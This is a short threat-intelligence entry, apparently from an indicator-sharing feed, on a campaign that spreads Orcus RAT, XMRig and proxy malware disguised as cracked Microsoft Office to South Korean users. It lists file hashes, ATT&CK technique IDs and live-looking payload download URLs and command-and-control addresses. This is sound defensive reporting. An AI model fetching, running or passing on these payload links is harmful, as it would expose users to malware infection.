Malware (XMRig, OrcusRAT, etc.) disguised as MS Office crack
May 10, 2024, 2:25 p.m.
Tags
External References
Description
The report details an ongoing malware campaign targeting South Korean users, which disguises malicious payloads as cracked versions of Microsoft Office and other popular software. The attackers are distributing a variety of malware, including downloaders, coin miners, remote access tools (RATs), proxies, and anti-antivirus components. These are installed persistently through scheduled tasks and utilise encoded PowerShell commands for updates. The primary malware families identified include Orcus RAT for system control, XMRig cryptominer, 3Proxy for creating a proxy network, and components to evade security products.
Date
Published: May 10, 2024, 1:45 p.m.
Created: May 10, 2024, 1:45 p.m.
Modified: May 10, 2024, 2:25 p.m.
Indicators
f417007224bc2b16cc208eb26c1543340529a00ac8c919582eccd7d60a235243
f8793917d4d58470b6f9bb1714f4f3fba2c1fc188e97f416ab91ef6edcf07794
316103a71d0ca556f00ff23f4ba996d2564dceccb88a2217fe1cc742123001d3
https://gist.github.com/thamanarya/6510d9e6b96adfea6b9422a3fd22ef82/raw/Power
https://drive.usercontent.google.com/download?id=1SFoSCa4PhCsR7ACj8HUIfrU7L1i8YwiR&export=download
https://drive.usercontent.google.com/download?id=1kFPqJkzWKIIQzC3b0b6nunctXKHPeJNi&export=download
https://t.me/IXvMGsiyPuHoPSSiD
https://mastodon.social/@dRidulEDhRQYNREkN
http://minecraftrpgserver.com:27037
http://minecraftrpgserver.com:80
https://t.me/dRidulEDhRQYNREkN
http://minecraftrpgserver.com:27036
Attack Patterns
OrcusRAT
PureCrypter
XMRig
T1593.001
T1593.002
T1562.004
T1564.003
T1564.001
T1059.001
T1562.001
T1489
T1105